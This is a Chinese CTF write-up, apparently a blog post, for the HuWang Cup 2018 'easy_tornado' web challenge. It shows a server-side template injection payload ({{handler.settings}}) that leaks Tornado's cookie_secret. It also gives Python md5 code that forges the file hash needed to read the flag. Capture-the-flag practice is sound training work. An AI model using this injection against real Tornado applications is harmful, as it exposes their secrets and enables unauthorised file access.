美文网首页
护网杯 2018-WEB-easy_tornado 1

护网杯 2018-WEB-easy_tornado 1

作者: le3f | 来源:发表于2020-04-05 12:03 被阅读0次

漏洞复现地址
https://buuoj.cn/challenges#[护网杯%202018]easy_tornado

  • 考察点:服务端模板注入(ssti攻击)

打开存在三个文件


image.png

查看flag.txt ,flag所在文件/flllllllllllag,文件名+filehash都到文件


image.png

welcome.txt中存在render
render为python渲染函数
https://cn.vuejs.org/v2/guide/render-function.html

hint文件中提示filehash为cookie_secret+md5的filename组成


image.png

filename改为fllllllllllg时报错error页面存在模板注入

image.png
找到cookie_secret
http://21f57b78-60e0-4b5d-9a1c-adc9e1e8505c.node3.buuoj.cn/error?msg={{handler.settings}} image.png

md5加密

print(hashlib.md5(b'/fllllllllllllag').hexdigest())
print(hashlib.md5(b'cb86f54f-3513-4eae-b6fb-587d2e82082e3bf9f6cf685a6dd8defadabfb41a03a1').hexdigest())
image.png

相关文章

  • 护网杯 2018-WEB-easy_tornado 1

    漏洞复现地址https://buuoj.cn/challenges#[护网杯%202018]easy_tornad...

  • [护网杯] writeup

    护网杯 Web : ltshop (done) 条件竞争 + 整型溢出条件竞争用bp就可以了,只要大于5个能买第二...

  • 2019护网杯_pwn

    题目地址:https://github.com/hacker-mao/ctf_repo/tree/master/%...

  • 护网杯_2018_huwang

    看到这个题目就觉得有点眼熟, 后来发现就是国赛awd题目改了改. (可能就是北航把自己国赛出的题目改了一下吧......

  • web-ssti

    [护网杯 2018]easy_tornado 先来简单点的,看到tornado就想到SSTI。/flag.txt/...

  • [护网杯 2018]easy_tornado

    [护网杯 2018]easy_tornado 给了三个txt,flag.txt给出了flag文件,welcome....

  • [护网杯 2018]easy_tornado

    通过题目名字tornado猜测这个网站是使用python写的 Tornado是一个Python web框架和异步网...

  • 【护网杯】Web部分相关知识点

    参考:2018护网杯-web部分题解本文讲解其中用到的相关知识点。 easy tornado hint.txtmd...

  • 2018年10月护网杯 WriteUp

    Web Easy tornado 看过题目,需要我们找到一个叫做cookie_secret的东西即可。进行模板注入...

  • 2019-护网杯-pwn-mergeheap

    题目逻辑 main add delete print merge 分析 利用merge和空间分配时候presize...

网友评论

      本文标题:护网杯 2018-WEB-easy_tornado 1

      本文链接:https://www.haomeiwen.com/subject/xhxuphtx.html